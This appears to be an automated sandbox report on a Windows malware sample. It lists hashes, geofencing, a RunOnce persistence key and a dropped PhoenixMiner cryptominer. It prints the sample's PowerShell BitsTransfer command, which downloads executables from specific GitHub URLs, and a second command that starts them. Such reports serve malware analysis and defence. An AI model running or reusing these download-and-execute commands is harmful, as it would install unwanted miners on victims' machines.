Analysis
-
max time kernel
103s -
max time network
109s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
resource tags
arch:x64arch:x86image:win10v2004-20220414-enlocale:en-usos:windows10-2004-x64system -
submitted
15-07-2022 21:28
Static task
static1
Behavioral task
behavioral1
Sample
3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe
Resource
win10v2004-20220414-en
General
-
Target
3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe
-
Size
8.3MB
-
MD5
9ed9ad87a1564fbb5e1b652b3e7148c8
-
SHA1
0c001b7e9615cbc22eac2a324d8deb7eaf069ff7
-
SHA256
3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89
-
SHA512
e49e403a73ff1d10111d23cc70ae95ffae63abbc4a52cfc52c447ee9f15e76ab44f07d0f41e3b3e63a73a07e7748b8ac7ed8c997f1051a10ca5fad1dace4183a
Malware Config
Extracted
https://raw.githubusercontent.com/jkh36/d/main/bild.exe
https://raw.githubusercontent.com/jkh36/d/main/PhoenixMiner.exe
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
PhoenixMiner.exepid process 4176 PhoenixMiner.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation 3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
PhoenixMiner.exedescription ioc process Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce PhoenixMiner.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" PhoenixMiner.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid process 4464 powershell.exe 4464 powershell.exe 4848 powershell.exe 4848 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 4464 powershell.exe Token: SeDebugPrivilege 4848 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exePhoenixMiner.exedescription pid process target process PID 4744 wrote to memory of 4176 4744 3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe PhoenixMiner.exe PID 4744 wrote to memory of 4176 4744 3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe PhoenixMiner.exe PID 4744 wrote to memory of 4176 4744 3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe PhoenixMiner.exe PID 4176 wrote to memory of 4464 4176 PhoenixMiner.exe powershell.exe PID 4176 wrote to memory of 4464 4176 PhoenixMiner.exe powershell.exe PID 4176 wrote to memory of 4464 4176 PhoenixMiner.exe powershell.exe PID 4176 wrote to memory of 4848 4176 PhoenixMiner.exe powershell.exe PID 4176 wrote to memory of 4848 4176 PhoenixMiner.exe powershell.exe PID 4176 wrote to memory of 4848 4176 PhoenixMiner.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe"C:\Users\Admin\AppData\Local\Temp\3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4744 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4176 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command Import-Module BitsTransfer; Start-BitsTransfer -Source https://raw.githubusercontent.com/jkh36/d/main/bild.exe,https://raw.githubusercontent.com/jkh36/d/main/PhoenixMiner.exe -Destination lWr.exe,ck.exe;3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4464 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command Start-Process lWr.exe; Start-Process ck.exe;3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4848
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5b6deac3351c943410eafe90bc93687c8
SHA134ff10b6e186ff6f7b6f39ebb127ee137ade5589
SHA2561775d61fb6831a2c572bb51d5772952ee13bbee68bde0367546bb04811a70f0a
SHA5123e025c20277dff003fe09afa2a9014d2fe42761bec935f7d7eb917ddb5b8760d5e3bc643e81d28fa7352c398cbdffcc0dbb5302e7fc6b97969387a3ef313b880
-
Filesize
53KB
MD5079a33c4fee1c86c054b53ed3be615ba
SHA15e0380500c12f97740565c15d12f784fbc38b8f9
SHA256d7c6ba965d23b558dc950644133250b327df98ab295aee49f81ee4420bafc6c7
SHA512548d4bd900f53f3bff1c3bd4654cd1bdc1247d6ef9ea4b70e76120bbd7c1931d6129a306bcd29573c7324451c3cb98e68cfb3d97cc3a954df2170adc25aae619
-
Filesize
19KB
MD5091e2e8fbb17bbf54b7c650e34dc6c22
SHA1a6b3b9ecd04aa49db3ad48bd030b3e441bce2c09
SHA2569c6e83cd6015fea0f2c9bd84911121f3d6fe928d530ac44c4f97ba03ab48c448
SHA5125a937969639cd5c7f746c35757f802595d1dad4292d2a837b93ddc7c990389cff351063a60ebf5f039c0b9b07ce933c2576dc7f44b764c1733a920ba30bcce33
-
Filesize
8.2MB
MD5c74ab76362f2321b7143e8ba2517c16b
SHA16b4c65e2b1ba59d155c5d453285fae4d3e52b2a6
SHA256938cb901511ceac91acd8b1eaadabd01688852ed1121250b1c5e587f9ee0512f
SHA5122a506ba53d4dc837bfabee920617fddc2152fb0a474f6a197086c6ce1aadf7b1f1bc64e8d27b9759cdd567675273c99f6af29c61e9a6c5184171336a1a869a17
-
Filesize
8.2MB
MD5c74ab76362f2321b7143e8ba2517c16b
SHA16b4c65e2b1ba59d155c5d453285fae4d3e52b2a6
SHA256938cb901511ceac91acd8b1eaadabd01688852ed1121250b1c5e587f9ee0512f
SHA5122a506ba53d4dc837bfabee920617fddc2152fb0a474f6a197086c6ce1aadf7b1f1bc64e8d27b9759cdd567675273c99f6af29c61e9a6c5184171336a1a869a17